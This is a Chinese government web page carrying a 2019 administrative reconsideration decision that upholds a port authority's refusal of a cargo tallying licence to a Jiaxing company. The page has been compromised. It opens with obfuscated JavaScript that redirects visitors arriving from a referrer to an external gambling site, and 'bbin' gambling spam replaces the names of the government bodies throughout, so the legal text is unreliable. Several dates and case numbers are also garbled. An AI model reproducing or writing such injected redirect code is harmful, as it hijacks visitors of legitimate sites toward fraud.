var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > 行政复议
发布日期:2019-10-30 浏览次数: 字号:[ ]

申请人:嘉兴某公司 

被申请人:bbin宝盈,bbin下载:港务管理局

 

申请人嘉兴某公司不服被申请人bbin宝盈,bbin下载:港务管理局作出的《bbin宝盈,bbin下载:港务管理局不予行政许可决定书(编号:浙港政-FJ2018〕*),于2018年127日向本机关申请行政复议,请求撤销该决定。本机关受理后依法进行了审查,因案情复杂,延期三十日作出决定,现已审理终结。

申请人嘉兴某公司述称:bbin宝盈,bbin下载:人民政府于2018年11月5日作出《bbin宝盈,bbin下载:人民政府行政复议决定书》(嘉政复字2018*号),撤销bbin宝盈,bbin下载:港务管理局对嘉兴某公司作出的bbin宝盈,bbin下载:港务管理局准予行政许可决定书(编号:浙港政-FJ2018〕*),责令bbin宝盈,bbin下载:港务管理局对嘉兴某公司申请的港口经营许可申请重新作出决定。bbin宝盈,bbin下载:港务管理局于2018年11月28日作出《bbin宝盈,bbin下载:港务管理局不予行政许可决定书》(编号:浙港政-FJ2018〕*),不予行政许可。嘉兴某公司认为bbin宝盈,bbin下载:港务管理局作出的不予行政许可决定违法,依法应予撤销,理由如下:一、嘉兴某公司申请的行政许可事项为“港口理货经营许可”,提交的《凯新认证(北京)有限公司质量管理体系认证证书》(注册号:626018Q12698R0S)的认证覆盖范围“船舶货物理货信息咨询”符合《港口经营管理规定》第八条第四项“具有符合相关通用要求的质量管理体系”规定,bbin宝盈,bbin下载:港务管理局作出不予行政许可错误且对不予行政许可决定的理由未进行说明;二、嘉兴中联理货有限公司是目前嘉兴港一家取得理货业务行政许可的企业。嘉兴中联理货有限公司提交的《质量管理体系认证证书》与申请人嘉兴某公司提交的《质量管理体系认证证书》性质一致,均为理货业务,但bbin宝盈,bbin下载:港务管理局对嘉兴某公司作出不予行政许可,属于实行差别对待,保护现有的垄断经营。

被申请人bbin宝盈,bbin下载:港务管理局辩称:bbin宝盈,bbin下载:港务管理局作出的bbin宝盈,bbin下载:港务管理局不予行政许可决定书(编号:浙港政-FJ2018〕*)符合法定程序,适用法律、法规正确,事实清楚。2018年11月7日,bbin宝盈,bbin下载:港务管理局收到bbin宝盈,bbin下载:人民政府作出的《bbin宝盈,bbin下载:人民政府行政复议决定书》(编号:嘉政复字2018*号),撤销《bbin宝盈,bbin下载:港务管理局准予行政许可决定书》(编号:浙港政-FJ2018〕*),要求bbin宝盈,bbin下载:港务管理局重新作出决定。bbin宝盈,bbin下载:港务管理局经重新审查认为:bbin宝盈,bbin下载:风云理货有限公司提交的《凯新认证(北京)有限公司质量管理体系认证证书》(注册号:626018Q12698R0S)的认证覆盖范围“船舶货物理货信息咨询”不符合《港口经营管理规定》第八条第四项“具有符合相关通用要求的质量管理体系”,根据《中华人民共和国行政许可法》第三十八条第二款,《中华人民共和国港口法》第二十四条、第二十五条,于2018年11月28作出《bbin宝盈,bbin下载:港务管理局不予行政许可决定书》(编号:浙港政-FJ2018〕*),明确说明了不予行政许可的理由,并告知bbin宝盈,bbin下载:风云理货有限公司依法享有申请行政复议或者提起行政诉讼的权利。《bbin宝盈,bbin下载:港务管理局不予行政许可决定书》(编号:浙港政-FJ2018〕*)于同日直接送达bbin宝盈,bbin下载:风云理货有限公司。故bbin宝盈,bbin下载:港务管理局作出《bbin宝盈,bbin下载:港务管理局不予行政许可决定书》(编号:浙港政-FJ2018〕*)程序符合法律规定,适用法律法规正确,事实清楚。

本机关查明:2018年11月7日,bbin宝盈,bbin下载:港务管理局收到bbin宝盈,bbin下载:人民政府作出的《bbin宝盈,bbin下载:人民政府行政复议决定书》(编号:嘉政复字2018*号),撤销《bbin宝盈,bbin下载:港务管理局准予行政许可决定书》(编号:浙港政-FJ2018〕*),要求bbin宝盈,bbin下载:港务管理局重新作出决定。bbin宝盈,bbin下载:港务管理局根据嘉兴某公司于2018年8月14日提交的《港口经营许可申请书》及《凯新认证(北京)有限公司质量管理体系认证证书》(注册号:626018Q12698R0S)等申请材料,于2018年11月28日作出《bbin宝盈,bbin下载:港务管理局不予行政许可决定书》(编号:浙港政-FJ2018〕*),决定“根据《bbin宝盈,bbin下载:人民政府行政复议决定书》(编号:嘉政复字2018*号),经重新审查,你单位提交的《凯新认证(北京)有限公司质量管理体系认证证书》(注册号:626018Q12698R0S)的认证覆盖范围 ‘ 船舶货物理货信息咨询’不符合《港口经营管理规定》第八条第四项‘ 具有符合相关通用要求的质量管理体系’。根据《中华人民共和国行政许可法》第三十八条第二款、《中华人民共和国港口法》第二十四条、第二十五条,本机关决定不予行政许可。”该决定书于同日送达嘉兴某公司。嘉兴某公司不服该决定,引发本案争议。

以上事实,有《bbin宝盈,bbin下载:人民政府行政复议决定书》(编号:嘉政复字2018*号)港口经营许可申请书《凯新认证(北京)有限公司质量管理体系认证证书》(注册号:626018Q12698R0S)、《bbin宝盈,bbin下载:港务管理局行政许可申请受理通知书》(编号:浙港政-FJ2018〕*)、《bbin宝盈,bbin下载:港务管理局不予行政许可决定书》(编号:浙港政-FJ2018〕*、营业执照、送达回证等证据为证。

本机关认为,根据交通运输部《关于换发理货业务经营许可证的通知》(交水发〔2010602号),明确规定“证书名称为《中华人民共和国港口经营许可证》(港口理货业务)。理货业务经营范围为:国际、国内航线船舶货物及集装箱的理货、理箱;集装箱装、拆箱理货;货物计量、丈量;船舶水尺计量;监装、监卸;货损、箱损检验与鉴定;出具理货单证及理货报告;理货信息咨询等相关业务。本案中,嘉兴某公司申请的行政许可事项为“港口理货经营许可”,但所提交的《凯新认证(北京)有限公司质量管理体系认证证书》(注册号:626018Q12698R0S的认证覆盖范围为“船舶货物理货信息咨询”,系“港口理货经营许可”业务范围之一,不符合《港口经营管理规定》第八条第一款第(四)项要求的“具有符合相关通用要求的质量管理体系”的条件。bbin宝盈,bbin下载:港务管理局根据《中华人民共和国行政许可法》第三十八条第二款的规定,作出《bbin宝盈,bbin下载:港务管理局不予行政许可决定书》(编号:浙港政-FJ〔2018〕*),决定不予行政许可,于法有据,并无不当。另bbin宝盈,bbin下载:港务管理局对嘉兴中联理货有限公司行政许可相关事宜,与本案无关,不在本案审理范围。

根据《中华人民共和国行政复议法》第二十八条第一款第()项之规定,决定如下:

维持bbin宝盈,bbin下载:港务管理局作出的《bbin宝盈,bbin下载:港务管理局不予行政许可决定书》(编号:浙港政-FJ2018〕*

申请人嘉兴某公司如不服本复议决定,可在收到本决定书之日起十五日内向人民法院起诉。

 

 

bbin宝盈,bbin下载:人民政府

                                  2019 33





打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统